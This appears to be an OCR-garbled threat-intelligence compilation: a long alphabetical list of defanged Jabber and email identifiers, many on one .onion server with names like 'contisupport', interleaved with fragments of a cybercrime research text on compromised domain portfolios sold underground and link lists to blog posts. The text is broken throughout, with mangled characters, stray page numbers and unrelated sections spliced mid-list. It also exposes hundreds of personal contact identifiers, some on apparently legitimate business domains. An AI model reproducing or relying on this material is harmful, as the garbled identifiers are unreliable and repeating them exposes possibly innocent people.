contisupport[.]q3mcco35auwcstmt.onion 
cooler[.]Jqg3mcco35auwcstmt.onion 
coopertinojam[.]Jgmx.com 
cosm123[.]xmpp.jp 
cosmos[.]q3mcco35auwcstmt.onion 
craft[.]Jqg3mcco35auwcstmt.onion 
crazzyygoeshbeverly[.]protonmail.com 
crunch[.]exploit.im 
cruz[.]Jqa3mcco35auwcstmt.onion 
cuba[.]Jq3mcco35auwcstmt.onion 
cueno[.]ro.ru 

cuprum[.]keemail.me 
daihudketa1986[.]protonmail.com 
dail[.Jjabber.sk 

daiverjm[.]exploit.im 
dallas[.]Jqg3mcco35auwcstmt.onion 
dandaul[.]ro.ru 
dandis[.]q3mcco35auwcstmt.onion 
dandmen[.]q3mcco35auwcstmt.onion 
danecarla7[.]protonmail.com 
darc[.]Jq3mcco35auwcstmt.onion 
dari7070[.]ro.ru 
dasix[.]protonmail.com 
dastin707[.]protonmai.com 
dastom|[.]ro.ru 

dastoon|[.]ro.ru 
david[.Jqg3mcco35auwcstmt.onion 
dediserv[. ]tutanota.com 
defender[.]q3mcco35auwcstmt.onion 
delta[.Jq3mcco35auwcstmt.onion 
deploy[.Jqg3mcco35auwcstmt.onion 
derek[.]Jq3mcco35auwcstmt.onion 
dereksupp[.]Jqg3mcco35auwcstmt.onion 


diamore[.]ro.ru 
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dick[.]Jq3mcco35auwcstmt.onion 
dickmor[.]protonmail.com 
dictynal[.]tssssss.info 
diez[.]exploit.im 
doloto[.]Jqg3mcco35auwcstmt.onion 
dominik[.]Jqg3mcco35auwcstmt.onion 
domovoy[.]qg3mcco35auwcstmt.onion 
doomsday[.]qg3mcco35auwcstmt.onion 
dorirus[.]q3mcco35auwcstmt.onion 
dove[.]Jq3mcco35auwcstmt.onion 
dpigeon|[.]exploit.im 

dreom[.]ro.ru 
driver[.]Jqg3mcco35auwcstmt.onion 
dsaind[.]tuta.io 

duhastich[.]jabber.ru 
duke[.]Jqg3mcco35auwcstmt.onion 
ebaxmg3lpi[.]mail.ru 
efrain[.]Jqg3mcco35auwcstmt.onion 
egental[.]lenta.ru 

ela[.]jabber.otr.im 
electronic[.]Jqg3mcco35auwcstmt.onion 
elon[.]Jq3mcco35auwcstmt.onion 
elvis[.]qg3mcco35auwcstmt.onion 
emailbases[.]jabber.org 
epacbesett1985[.]protonmail.com 
eraven[.]keemail.me 
erica[.]calahanlaw.com 
ericmeric[.]protonmail.com 
etsiujttsumi[.]hotmail.com 
etsumiutsumi[.]gmail.com 
expex[.]conference.q3mcco35auwcstmt.onion 
exploitdb[.]exploit.im 

famada[.]ro.ru 
fasker[.]Jq3mcco35auwcstmt.onion 


fast[.]Jq3mcco35auwcstmt.onion 
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faster 1963[.]xmpp.jp 
fedrone[.]ro.ru 
fergus[.]Jq3mcco35auwcstmt.onion 
fff[.]Jqg3mcco35auwcstmt.onion 
finn[.]q3mcco35auwcstmt.onion 
fischer[.]q3mcco35auwcstmt.onion 
flatunrira1985[.]protonmail.com 
flavius[.]thesecure. biz 
flip[.]Javtonom.org 
flip[.]qg3mcco35auwcstmt.onion 
focus[.]Jq3mcco35auwcstmt.onion 
food[.]Jqg3mcco35auwcstmt.onion 
forbes[.Jq3mcco35auwcstmt.onion 
ford[.]Jq3mcco35auwcstmt.onion 
forest[.]q3mcco35auwcstmt.onion 
forronessvil974[.]protonmail.com 
forus[.]qg3mcco35auwcstmt.onion 
foundun[.]protonmail.com 
fox[.]Jq3mcco35auwcstmt.onion 
fran[.]calahanlaw.com 
frank[.]q3mcco35auwcstmt.onion 
freeos2[.]tuta.io 
freeos2[.]yandex.ru 

frog. ]Jq3mcco35auwcstmt.onion 
fuckUSAhahaha[.]exploit.im 
fuckusa[.]exploit.im 
ganesh[.]Jqg3mcco35auwcstmt.onion 
gareuma|[.]protonmail.com 
garymartin777[.]protonmail.com 
gentleman[.]Jq3mcco35auwcstmt.onion 
geralemur[.]olddot.net 
germes[.]q3mcco35auwcstmt.onion 
get.u[.]inbox.ru 

ggfhfhhvcfdhgjyg 7t88958685[.]gmail.com 


ghost[.]Jg3mcco35auwcstmt.onion 
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gideon777[.]Jqg3mcco35auwcstmt.onion 
gikrum[.]protonmail.com 
gina[.]calahanlaw.com 
glenolson003[.]gmail.com 
globus[.]qg3mcco35auwcstmt.onion 
goldcoin[.Jexploit.im 
good[.]Jqg3mcco35auwcstmt.onion 
good _place[.]conference.q3mcco35auwcstmt.onion 
graddds[.]xmpp.jp 
grajdanin[.]Jq3mcco35auwcstmt.onion 
grant[.]Jq3mcco35auwcstmt.onion 
green[.]Jqg3mcco35auwcstmt.onion 
gregony[.]protonmail.com 
gremat[.]rambler.ua 
gringo[.]q3mcco35auwcstmt.onion 
grom[.]qg3mcco35auwcstmt.onion 
grossman[.]q3mcco35auwcstmt.onion 
guliver[.]xmpp.sh 
gurtan[.]keemail.me 
gus[.]qg3mcco35auwcstmt.onion 
hash[.]qg3mcco35auwcstmt.onion 
highjob[.]protonmail.ch 
highping[.]ro.ru 
hlor[.]Jqg3mcco35auwcstmt.onion 
hof[.]Jqg3mcco35auwcstmt.onion 
hookam[. ]autorambler.ru 
hopkins[.]Jq3mcco35auwcstmt.onion 
hose007[.]protonmail.com 
host[.]q3mcco35auwcstmt.onion 
huanivan[.]g3mcco35auwcstmt.onion 
huanlyu[.]keemail.me 
huazo[.]lenta.ru 

humminghead[. ]jabber.ru 
hurecer[.]rambler.ru 
husbrand[.]protonmail.com 
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idgo[.]Jqg3mcco35auwcstmt.onion 
ilon[.]Jqg3mcco35auwcstmt.onion 
imikitka[.]protonmail.com 
inat[.]qg3mcco35auwcstmt.onion 
info[.Jomnitrax.com 
info[.]Jq3mcco35auwcstmt.onion 
irutel88[.]Jlenta.ru 
iv4nconsult[.]yandex.ru 
ivanalert[.]jabber.ru 
ivanalert[.]q3mcco35auwcstmt.onion 
ixoxo[.]tuta.io 

jabelon[.]jabber.ru 
jafar[.]Jq3mcco35auwcstmt.onion 
jbergeon[.Jomnitrax.com 
jmax3946[.]protonmail.com 
johnmax82960[.]protonmail.com 
johnsher[.]protonmail.com 
jora[.]y2qmqomapszzryei.onion 
joseph.jacqueline[.]mail.ru 
jumbo[.]Jqg3mcco35auwcstmt.onion 
kagas[.]q3mcco35auwcstmt.onion 
kaktus[.]Jq3mcco35auwcstmt.onion 
kannpheforre1975[.]protonmail.com 
karlmarx00O[.]protonmail.com 
karmeone[.]ro.ru 
katie1980[.]163.com 
keeperchic28[.]aol.com 
keiblemuel84132[.]gmail.com 
ken.kowall.]fieldsauto.com 
kent[.]q3mcco35auwcstmt.onion 
kerasid[.]q3mcco35auwcstmt.onion 
kerberos[.]Jq3mcco35auwcstmt.onion 
kevin[.]Jq3mcco35auwcstmt.onion 
keykey[.Jq3mcco35auwcstmt.onion 


kgarot[.]gmail.com 
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kiioto[.]ro.ru 
killer[.]qg3mcco35auwcstmt.onion 
kingston[.]Jq3mcco35auwcstmt.onion 
kockman[.]protonmail.com 
koncord[.]qg3mcco35auwcstmt.onion 
koolum[.]protonmail.com 
kramer[.Jq3mcco35auwcstmt.onion 
kran[.]Jqg3mcco35auwcstmt.onion 
kroundarey[.]keemail.me 
kurt[.]q3mcco35auwcstmt.onion 
larosfages[.]gmail.com 
legall[.]protonmail.com 
lemur[.]g3mcco35auwcstmt.onion 
leo[.]q3mcco35auwcstmt.onion 
licor[.]qg3mcco35auwcstmt.onion 
listun[.]protonmail.com 
Imcgee[.]bricknerfamily.com 
loadsupport1[.]Jq3mcco35auwcstmt.onion 
loadsupport2[.]Jq3mcco35auwcstmt.onion 
loaloverre1984[.]protonmail.com 
log.foreman|[.]biendongpoc.vn 
log[.]q3mcco35auwcstmt.onion 
logan[.]Jq3mcco35auwcstmt.onion 
longer[.]Jqg3mcco35auwcstmt.onion 
louigarlufea1984[.]protonmail.com 
love[.]Jqg3mcco35auwcstmt.onion 
lucas[.]Jq3mcco35auwcstmt.onion 
Iwgihlilww[.]jabberes.org 

m2686[. ]jabber.ru 
macocina[.]rambler.ru 
macros[.]Jqg3mcco35auwcstmt.onion 
mango[.]q3mcco35auwcstmt.onion 
maniaro[.]ro.ru 
many[.]qg3mcco35auwcstmt.onion 


marcus[.]qg3mcco35auwcstmt.onion 
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mario2bebi[.]jabb.im 
mario[.]qg3mcco35auwcstmt.onion 
mark[.Jq3mcco35auwcstmt.onion 
marsel[.]Jq3mcco35auwcstmt.onion 
marxkarl777[.]protonmail.com 
masscrypt[.]exploit.im 
matiz[.]Jq3mcco35auwcstmt.onion 
mavalek[.]Jq3mcco35auwcstmt.onion 


mavelek[.Jq3mcco35auwcstmt.onion 


mavemat[.]q3mcco35auwcstmt.onion 


max3100[.]protonmail.com 
max[.]n4iaacb37wmaclht.onion 
max[.]Jq3mcco35auwcstmt.onion 
maxhalikus[.]xmpp.ru 
maxkl448[.]protonmail.com 
maxmartin777[.]protonmail.com 
melis-13[.]yandex.ru 
mentos[.]Jqg3mcco35auwcstmt.onion 
merch[.]Jq3mcco35auwcstmt.onion 
merlin[.]Jqg3mcco35auwcstmt.onion 
mesccuo[. ]rambler.ru 
miguell.Jq3mcco35auwcstmt.onion 
mikroon[. ]lenta.ru 
milanmarley[.]protonmail.com 
milwerta[.]tuta.io 
mimiken[.]protonmail.com 
minakerawatsonn[.]gmail.com 
minakersonn[.]hotmail.com 
modar[.]qg3mcco35auwcstmt.onion 
modnik[.]q3mcco35auwcstmt.onion 
mokrik[.]protonmail.com 
molakzal[.]protonmail.com 
moms[.]qg3mcco35auwcstmt.onion 
monazen[.]protonmail.com 


moon[.]Jqg3mcco35auwcstmt.onion 
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morgan[.]Jqg3mcco35auwcstmt.onion 
mors[.]qg3mcco35auwcstmt.onion 
muchacho[.]g3mcco35auwcstmt.onion 
muhoboi[.]Jqg3mcco35auwcstmt.onion 
murorul[.]ro.ru 
mushroom|[.]q3mcco35auwcstmt.onion 
mustanota[.]tutanota.com 
myagra[.]rambler.ua 
n19john84galt[.]gmail.com 
n25novitskiy[.]gmail.com 
nAndrea.Davis.1989[.]protonmail.com 
nArissaCreedon[.]protonmail.com 
nBellefleurKimika[.]protonmail.com 
nBrandnBuddie[.]protonmail.com 
nChasenRuest[.]protonmail.ch 
nClariceDesantis[.]protonmail.com 
nDaninaCassady[.]protonmail.com 
nDaveglidinerib1972[.]protonmail.com 
nDetrolioNichols[.]protonmail.com 
nErnoGreggory[.]protonmail.com 
nJessica.Harris.1991[.]protonmail.com 
nLineaBohmer[.]protonmail.com 
nMoniqueLArmwood2534sdf[.]protonmail.com 
nNasheajahn[.]protonmail.com 
nPtuva8712[.]mail.ru 
nRethmanMarlicia4ah[. ]protonmail.com 
nStephanieBrown27[.]protonmail.com 
nTiffanyJPacheco454dfg[.]protonmail.com 
nVLSinfo[.]varroclighting.com 
nWhitmeyerRory[.]protonmail.com 
nYasminCapshawl[.]protonmail.com 
na12s34d56f78[.]outlook.com 

naasa[. ]jabber.sk 

nafasd[.]asda.com 
nalexcrypt[.]neko.im 
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[11]Thousands of IM Screen Names in the Wild 
[12]Yahoo Messenger Controlled Malware 


http: //ddanchev. blogspot .com/2007/10/thousands- of - im-screen-names-in-wild.html 
| 
http: //ddanchev. blogspot .com/2008/09/skype-spamming-tool-in-wild-part-two.htm 
http: //ddanchev. blogspot .com/2007/09/diy-exploits-embedding-tools.htm 

http: //ddanchev. blogspot .com/2008/09/skype-spamming-tool-in-wild-part-two.htm 


http: //ddanchev. blogspot .com/2008/04/skype-spamming-tool-in-wild.htm 


. http: //ddanchev. blogspot .com/2008/05/harvest ing-youtube-usernames- for. htm 


http: //ddanchev. blogspot .com/2008/02/uncovering-msn-social-engineering-scam.htm 


. http: //ddanchev. blogspot .com/2007/05/msn-spamming-bot . htm 


. http: //ddanchev. blogspot. com/2008/01/diy-fake-msn-client-stealing-passwords . htm 


OMNANARWNE 


H 
oO 


11. http: //ddanchev.blogspot.com/2007/10/thousands-of-im-screen-names-in-wild.htm 


12. http: //ddanchev.blogspot .com/2007/11/yahoo-messenger-controlled-malware.htm 


4.11.7 More Compromised Portfolios of Legitimate Domains for Sale 
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The [l]longoing supply of access to [2]compromised portfolios consisting of hundreds, some- 
times [3]thousands of legitimate domains, is continuing to produce anecdotal situations. 
For instance, in one of the latest propositions, a cybercriminal has managed to hijack the 
blackhat SEO domains portfolio (8,145 domains plus another 100 legitimate ones) of another 
cybercriminal, and is now offering it for sale. 


1996 


nalinposol1974[.]protonmail.com 
nallen3421frank8723[.]gmail.com 
nandrea1968[.]163.com 
naned[.]Jq3mcco35auwcstmt.onion 
nangosusdand1987[.]protonmail.com 
nanyproxy[.]jabbim.p 
nardenbirdie[.]protonmail.com 
narescortez/0[.]protonmail.com 
narregagkest1987[.]protonmail.com 
narspectal[.]keemail.me 
nasutina[.]mail.ua 
natlasjairO[.]protonmail.com 
naweetsnark[.]protonmail.com 
nbanzum[.]protonmail.com 
nbaron8[.]ro.ru 
nbartofestge1973[.]protonmail.com 
nbayle.docsavage[.]gmail.com 
nbbdfhguygfes[.]mail.ru 
nbeaucombcomli1987[.]protonmail.com 
nbeimezemste1970[.]protonmail.com 
nbenalen[.]Jexploit.im 
nbentderstlinpart1987[.]protonmail.com 
nbeverley1990[.]163.com 
nbigstarsforever[.]protonmail.com 
nbikrut[.]protonmail.com 
nbingoteamneverdream[.]protonmail.com 
nblythebirdie7866[.]protonmail.com 
nbob.to[.]zoho.com 
nbolkum[.]protonmail.com 
nbonen109[.]mail.ru 
nbositasi1986[.]protonmail.com 
nbutthotchcorngamb1981[.]protonmail.com 
nbuwormeki1977[.]protonmail.com 
ncany[.]Jq3mcco35auwcstmt.onion 


ncatuta[.]tuta.io 
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ncc33dfg9[.]hotmail.com 
nccbn521[.]gmail.com 
nceslingvafil973[.]protonmail.com 
ncetitobelt1970[.]protonmail.com 
nchoforcioglyc1982[.]protonmail.com 
nchondstatcipop1973[.]protonmail.com 
nchrisduffy17[.]gmail.com 
nchriswoakes851[.]protonmail.com 
nchriswoakes888[.]protonmail.com 
ncircaherrchi1988[.]protonmail.com 
ncjhfvdjhgfshbf[.]mail.ru 
nclarrestpoto1976[.]protonmail.com 
ncloverlilac7876[.]protonmail.com 
nconcbuzzmittcou1982[.]protonmail.com 
nconsfronepun1983[.]protonmail.com 
nconsracvide1973[.]protonmail.com 
ncontisupport[.]q3mcco35auwcstmt.onion 
ncrabomtotxyal1980[. ]protonmail.com 
ncrazy _digger[.]jabber.ru 
ncrazybOz[.]protonmail.com 
ncrazzyygoeshbeverly[.]protonmail.com 
ncurtgaebriel[.Jgmail.com 
ndacjvhjicdgfvi[.]mail.ru 
ndaihudketa1986[.]protonmail.com 
ndandis[.]qg3mcco35auwcstmt.onion 
ndanebirch9[.]protonmail.com 
ndanelavender268[.]protonmail.com 
ndarik1981[.]163.com 
ndilanmarley6[.]protonmail.com 
ndilanmarley8[.]protonmail.com 
ndinojia[.]protonmail.com 
ndistmissfighster1967neydweelrie[.]protonmail.com 
ndksfhsifgisldfcvxz[.]mail.ru 
ndog3112[.]outlook.de 
ndonnaj113300[.]gmail.com 
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ndowncanjacksec1984[.]protonmail.com 
ndriver[.]qg3mcco35auwcstmt.onion 
necjefhysu1973[.]protonmail.com 
nemmypopl[.]protonmail.com 
nenpresbardio1971[.]protonmail.com 
neo[.]Jq3mcco35auwcstmt.onion 
nepacbesett1975[.]protonmail.com 
nerideline[.]keemail.me 
nernmold[.]protonmail.com 
nesher1985[.]163.com 
nesraben[.]protonmail.com 
nevada[.Jq3mcco35auwcstmt.onion 
nevskiyO[.]jabbim. pl 
newera[.]keemail.me 
nfansadirfden1971[.]protonmail.com 
nfantdotmufflung1974[.]protonmail.com 
nfolkam[.]protonmail.com 
nfolkum[.]protonmail.com 
nfollvipostre1974[.]protonmail.com 
nforrestdane79[.]protonmail.com 
nfreddy1999[.]163.com 
nfresnoequipmentit[.]gmail.com 
nfvaretto[.]varroclighting.com 
ngaiterberesp1986[.]protonmail.com 
ngarold1995[.]163.com 
ngarybanton66[.]protonmail.com 
ngaryjose777[.]protonmail.com 
ngarymartin777[.]protonmail.com 
ngarywhite777[.]protonmail.com 
ngetwall[.]protonmail.com 
ngeupajavul1976[.]protonmail.com 
nggfhfhhvcfdhgjyg 7t88958685[.]gmail.com 
ngicksun[.]protonmail.com 
ngikrum[.]protonmail.com 
ngillbert1983[.]163.com 
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nginomiller804[.]protonmail.com 
nginutdomal1981[.]protonmail.com 
nglennmartin876[.]protonmail.com 
nglucicerol1970[.]protonmail.com 
ngokcin[.]protonmail.com 
ngopytom[.]protonmail.com 
ngotkin[.]protonmail.com 
ngraddds[.]xmpp.jp 
ngrestedrepar1989[.]protonmail.com 
nguaysularigh1979[.]protonmail.com 
nguru[.]mail.ru 
nhalabum[.]protonmail.com 
nhalegarrison77[.]protonmail.com 
nhalekit159[.]protonmail.com 
nhawhunrocu1982[.]protonmail.com 
nhelretera1970[.]protonmail.com 
nhennry1974[.]163.com 
nhighcostnafil978[.]protonmail.com 
nhildsandfilmrock1980[.]protonmail.com 
nhocktum[.]protonmail.com 

nicarus __83[.]hotmail.com 
nidehack[.]gmx.de 
nidgo[.]Jqg3mcco35auwcstmt.onion 
nik-da[.]Jq3mcco35auwcstmt.onion 
nilplugorphar1978[.]protonmail.com 
nimertracsing1988mubapea|[.]protonmail.com 
ninsepotal984[.]protonmail.com 
nintiloten1983[.]protonmail.com 
niosnupicin1987[.]protonmail.com 
nirchascandzard1985[.]protonmail.com 
nireltisu1969[.]protonmail.com 
nisretela19[.]protonmail.com 
nisums[.]protonmail.com 
nitro[.]jabberes.org 
njanny1966[.]163.com 
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njaredkahl22[.]gmail.com 
njarry1977[.]163.com 
njaymurray.murray[.]gmail.com 
njennief1985[.]163.com 


njeroenmooijman[.]hotmail.com 


njesroysqualhand1974[.]protonmail.com 


njesser20[.]protonmail.com 
njhomsmith888[.]protonmail.com 
njmax3946[.]protonmail.com 
njohnmax82960[.]protonmail.com 
njosekarl317[.]protonmail.com 
njstevenson[.]varroclighting.com 
nkaktus[.]q3mcco35auwcstmt.onion 
nkallie1974[.]163.com 
nkannpheforre1975[.]protonmail.com 
nkatrin1990[.]163.com 
nkatsupport[.]protonmail.com 
nkavin1971[.]163.com 
nkeatenounraff1984[.]protonmail.com 
nkendpracpahal1986[.]protonmail.com 
nkimouqbone1982[.]protonmail.com 
nkitshaw5[.]protonmail.com 
nkoolum[.]protonmail.com 
nkrezovouzer1979[.]protonmail.com 
nkvdvs[.]bk.ru 
nlaiwingcider1977[.]protonmail.com 
nlarrie1978[.]163.com 
nleyramimu1975[.]protonmail.com 
nlighrebalfai1974[.]protonmail.com 
nlinksibnuwill988[.]protonmail.com 
nliotooncobed1981[.]protonmail.com 
nlistun[.]protonmail.com 
nlogytom[.]protonmail.com 
nloomtom[.]protonmail.com 


nlorapop[.]protonmail.com 
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nloren1981[.]163.com 
nlouigarlufeal984[.]protonmail.com 
nlyeevcorn[.]protonmail.com 
nmahesha88[. ]hotmail.com 
nmarkallen888[.]protonmail.com 
nmarry1977[.]163.com 
nmarsel[.]q3mcco35auwcstmt.onion 
nmavemat[.]q3mcco35auwcstmt.onion 
nmaxallen938[.]protonmail.com 
nmaxgary777[.]protonmail.com 
nmaxhead777[.]protonmail.com 
nmaxmartin777[.]protonmail.com 
nmeatfcomptroznal1977[.]protonmail.com 
nmedial[.]varroclighting.com 
nmemdehate1988[.]protonmail.com 
nmengalical1988[.]protonmail.com 
nmentsetomal1971[.]protonmail.com 
nmetilencong1985[.]protonmail.com 
nmichajfbahsdfgal[.]mail.ru 
nmichal1976[.]163.com 
nmilananson2[.]protonmail.com 
nmilanduke666[.]protonmail.com 
nmilanmarley[.]protonmail.com 
nmileswinsom[.]tutanota.com 
nminakerawatsonn[.]gmail.com 
nminloop[.]protonmail.com 
nmirtum[.]protonmail.com 
nmokrik[.]protonmail.com 
nmolakza[.]protonmail.com 
nmolkens[.]protonmail.com 
nmolkum[.]protonmail.com 
nmorttigola1979[.]protonmail.com 
nmuroru[.]ro.ru 
nnicenphacock1976[.]protonmail.com 
nnicolas.veneziale[.]gmail.com 
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nnikamoi[.]protonmail.com 
nniosnupicin1987[.]protonmail.com 
nnisums[.]protonmail.com 
nnotums[.]protonmail.com 
nnumsunoder1974[.]protonmail.com 
nnuun[.]ro.ru 
nodintodoul1971[.]protonmail.com 
nolivaswal1985[.]protonmail.com 
nolobanstok1999vanahear[.]protonmail.com 
noman[.]q3mcco35auwcstmt.onion 
nomon |. Jtutanota.com 
norangeapple341[.]mail.com 
norwayinbay[.]mail.com 
noutucgetsi1989[.]protonmail.com 
npatrik1991[.]163.com 
npaull1974[.]163.com 
npazwhyte[.]gmail.com 
npecverbchopo1977[.]protonmail.com 
npegasusR87[.]protonmail.com 
npepvtui9[. Jjabber.cz 
npeycetdisa1971[.]protonmail.com 
nphilipp1992[.]163.com 
npilmotemta1986[.]protonmail.com 
nplenforsiowoo001975[.]protonmail.com 
nplongel11[.]googlemail.com 
nponetre[.]q3mcco35auwcstmt.onion 
nposeylavender[.]protonmail.com 
nposeytobin777[.]protonmail.com 
nprobacimmus1987[.]protonmail.com 
nprofessor[.]q3mcco35auwcstmt.onion 
nproxybuy[.]jabber.ru 
nproxysup[.]jabber.ru 
nprtwin02[.]yahoo.com 
nquithirsreta1978[.]protonmail.com 
nranorslipho1953brocored[.]protonmail.com 
19939 


nranosfinger[.]protonmail.com 
nrefitzrengold1977[.]protonmail.com 
nrevers[.]Jqg3mcco35auwcstmt.onion 
nringpawslanin1984[.]protonmail.com 
nritithemla1970[.]protonmail.com 
nryan.stuart.011[.]gmail.com 
nsammuel1994[.]163.com 
nsamon1964[.]163.com 
nsamuell1987[.]163.com 
nsanctornopul1986[.]protonmail.com 
nsandlolyhol1976[.]protonmail.com 
nsandnalure1985[.]protonmail.com 
nsapehanti1988[.]protonmail.com 
nsarra1989[.]163.com 
nscot.townshend[.]protonmail.com 
nsimono1997[.]163.com 
nsiokitiphil973[.]protonmail.com 
nsjx1c[.]safejid.com 
nskyjconphonal1975[.]protonmail.com 
nslanalinob1977[.]protonmail.com 
nstamvermigo1981[.]protonmail.com 
nstunanitin1984[.]protonmail.com 
nsubsroreascal988[. ]protonmail.com 
nsummer[.]jabberpl.org 
nsupport[.]sockshub.net 
nsupport[.]wormjim.net 
nsurguitenve1986[.]protonmail.com 
ntasihighpha1979[.]protonmail.com 
ntastbutpchide1988[.]protonmail.com 
ntaylore1988[.]163.com 
ntempmullugold1987[.]protonmail.com 
ntersanscirval974[.]protonmail.com 
ntersgkiragpal971[.]protonmail.com 
ntibelltalco1989[.]protonmail.com 
ntiicocessqual1988[.]protonmail.com 
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ntiovomofal1984[. ]protonmail.com 
ntradaglandisc1973[.]protonmail.com 
ntreetennugal1970[.]protonmail.com 
ntsoutinerla1975[.]protonmail.com 
ntuicourcentbig1987[.]protonmail.com 
nulocuref1983[.]protonmail.com 
nululnefarc1985[.]protonmail.com 
nungamarme1994unfiphy[.]protonmail.com 
nvalery1968[.]163.com 
nversmohubfast1972[.]protonmail.com 
nverstevelney1994lingcandgolf[.]protonmail.com 
nvestzagceled1984[.]protonmail.com 
nviolettl1965[.]163.com 
nwechlibolslen1976[.]protonmail.com 
nwellproxadsit1980[.]protonmail.com 
nwickglycroundmeal1973[.]protonmail.com 
nwindpotabpal1978[.]protonmail.com 
nwingthampgouffkerp1980[.]protonmail.com 
nwoakescolin[.]protonmail.com 
nwonto[.]tuta.io 
nworlspirexel1971[.]protonmail.com 
nws1980[.]protonmail.com 
nxxx[.]protonmail.com 
nzikegnyarail992alkaabeau[.]protonmail.com 
nzlatruonuchand1972[.]protonmail.com 
nzudistranla1985[.]protonmail.com 
obiscope[.]ro.ru 

okx[.]keemail.me 
oldtimes[.]qg3mcco35auwcstmt.onion 
oliver[.]qg3mcco35auwcstmt.onion 
ololoenko[.]xmpp.jp 
olsen[.]qg3mcco35auwcstmt.onion 
onarotade[. ]tutanota.de 
onemail[.]keemail.me 


oremiazero[.]keemail.me 


19941 


oscar[.]qg3mcco35auwcstmt.onion 
osteru[.]ro.ru 
ostofford[.]protonmail.ch 
osunc[.]ro.ru 

oxu[.]ro.ru 
panda[.]q3mcco35auwcstmt.onion 
paranoik[.]Jq3mcco35auwcstmt.onion 
parker[.]Jq3mcco35auwcstmt.onion 
patrik80[.]tutanota.com 
perry[.]q3mcco35auwcstmt.onion 
phantom[.]q3mcco35auwcstmt.onion 
pharaon78[.]tutanota.com 
pilmotemta1986[.]protonmail.com 
pin[.]Jqa3mcco35auwcstmt.onion 
pincus[.]q3mcco35auwcstmt.onion 
pineapple[.]Jqg3mcco35auwcstmt.onion 
plaguedoc[.]shangryla.net 
polanders[.]exploit.im 
poll[.]Jconference.q3mcco35auwcstmt.onion 
poll[.]Jqg3mcco35auwcstmt.onion 
ponetre[.]q3mcco35auwcstmt.onion 
powerdxs[. ]jabber.ru 
pravdazanamil.]exploit.im 
price[.]q3mcco35auwcstmt.onion 
private[.]q3mcco35auwcstmt.onion 
professor[.]3mcco35auwcstmt.onion 
professor[.]q3mcco35auwcstmt.onion 
proffjeck[.]q3mcco35auwcstmt.onion 
project _talk[.Jconference.q3mcco35auwcstmt.onion 
proxylist4you.com[.]sj.ms 
pulseeer[.]jabberes.org 
pulyamaster[.]exploit.im 
pulyamaster[.]xabber.org 

qrasawa[. ]tutanota.com 
quite[.]q3mcco35auwcstmt.onion 
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Host Search Result!!! 
$145 Host(s) Found 


From an attacker’s perspective, are remotely exploitable SQL injections, the insecure hosting 
provider’s web interfaces, or the pragmatic possibility for data mining a botnet’s accounting 
data for access to such portfolios the tactic of choice? In both of these propositions, the seller 
is citing vulnerabilities within the web hosting providers as an attack tactic. 


The continues supply of such access is, however, a great indicator for the upcoming de- 
velopment of this segment within the underground marketplace in 2009. 


1. http: //ddanchev. blogspot .com/2008/08/compromised-cpanel-accounts-for-sale.htm 
2. http: //ddanchev.blogspot . com/2008/09/adult-network- of-1448-domains. html 


3. http: //ddanchev. blogspot .com/2008/10/compromised-portfolios-of-legitimate.htm 
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qwertycatt[.Jq3mcco35auwcstmt.onion 
ragessaflen[.]yahoo.com 
ramilramil[.]protonmail.com 
ramon[.]Jqg3mcco35auwcstmt.onion 
rand[.]q3mcco35auwcstmt.onion 
rasovserzh[.]mail.ru 
redmond[.]Jq3mcco35auwcstmt.onion 
redroom[.]q3mcco35auwcstmt.onion 
reshaev[.]Jq3mcco35auwcstmt.onion 
resloman[. ]tutanota.com 

rete4[.]ro.ru 
reuclothanid1972[.]gmx.fr 
revan[.]Jq3mcco35auwcstmt.onion 


revers[.]q3mcco35auwcstmt.onion 


romhambjummi1991tenloke[.]protonmail.com 


rox[.]Jqg3mcco35auwcstmt.onion 
rozetka[.]Jq3mcco35auwcstmt.onion 
saintanny|[.]gmail.com 
salamandra[.]qg3mcco35auwcstmt.onion 
samuan). ]tutanota.com 
sand[.]Jq3mcco35auwcstmt.onion 
sandy[.]q3mcco35auwcstmt.onion 
sapehanti1988[.]protonmail.com 
saulgdmn[.]jabb.im 


savage[.]q3mcco35auwcstmt.onion 


sdferwMelissaJBurke3513fghsad[.]protonmail.com 


sega[.]Jqg3mcco35auwcstmt.onion 
segej.ivanov001[.]mail.ru 
separator12[.]protonmail.com 
shaper[.]Jqg3mcco35auwcstmt.onion 
sharn[.]q3mcco35auwcstmt.onion 
shell[.]Jq3mcco35auwcstmt.onion 
sinistersio[.]thesecure.biz 
sirafim[.]qg3mcco35auwcstmt.onion 


skanwatemit1972[.]protonmail.com 
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skywalker[.]q3mcco35auwcstmt.onion 
slon[.]Jqg3mcco35auwcstmt.onion 
snoop3000[.]protonmail.com 
snowl.]q3mcco35auwcstmt.onion 
sonar[.]Jq3mcco35auwcstmt.onion 
song[.]Jq3mcco35auwcstmt.onion 
songteng[.]tutanota.com 
spider[.]q3mcco35auwcstmt.onion 
spoon[.]q3mcco35auwcstmt.onion 
ssbee[.]keemail.me 
staff[.]Jq3mcco35auwcstmt.onion 
stagov[.]lenta.ru 
stakan[.]Jqg3mcco35auwcstmt.onion 
stamvermigo1981[.]protonmail.com 
stefan[.]qg3mcco35auwcstmt.onion 
steller[.]Jq3mcco35auwcstmt.onion 
stephanie[.]calahanlaw.com 
stern[.]Jqg3mcco35auwcstmt.onion 
steve[.]q3mcco35auwcstmt.onion 
strix[.]Jq3mcco35auwcstmt.onion 
summer[.]jabberix.com 
summit[.]q3mcco35auwcstmt.onion 
sunday[.]q3mcco35auwcstmt.onion 
superuser2717[.]gmail.com 
support-100[.]exploit.im 
support[.]sockshub.net 
susannestephens84[.]myself.com 
swift[.]Jq3mcco35auwcstmt.onion 
tAshlineWalt172[.]yahoo.com 
tChaadlinonzh[.]yahoo.com 
tDorothyStewartkaPq[.]yahoo.com 
tHardenKidd49[.]yahoo.com 
tHennemanFern4[.]yahoo.com 
tHoangCounts31[.]yahoo.com 
tKahreAzure133[.]yahoo.com 
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tKasazhtiklon[.]yahoo.com 
tkKekogsakchun[.]yahoo.com 
tKesoranen[.]yahoo.com 
tLegatmenoekl[.]yahoo.com 
tNoeralizpueg[.]yahoo.com 
tSchatodalsaz[.]yahoo.com 
tShriverHruby76[.]yahoo.com 
tToarsichelen[.]yahoo.com 
tVakomsyurebf[.]yahoo.com 
ta.dubling[.]protonmail.com 
tadamom[.]protonmail.com 
taker[.]Jq3mcco35auwcstmt.onion 
taker [.]xmpp.jp 
takrainskayal[.]rambler.ua 
talar[.]Jq3mcco35auwcstmt.onion 
taota[.]tuta.io 
target[.]Jqg3mcco35auwcstmt.onion 
tatarin[.]qg3mcco35auwcstmt.onion 
taur[.]Jqg3mcco35auwcstmt.onion 
tbackup349[.]protonmail.com 
tbenj1987[.]protonmail.com 
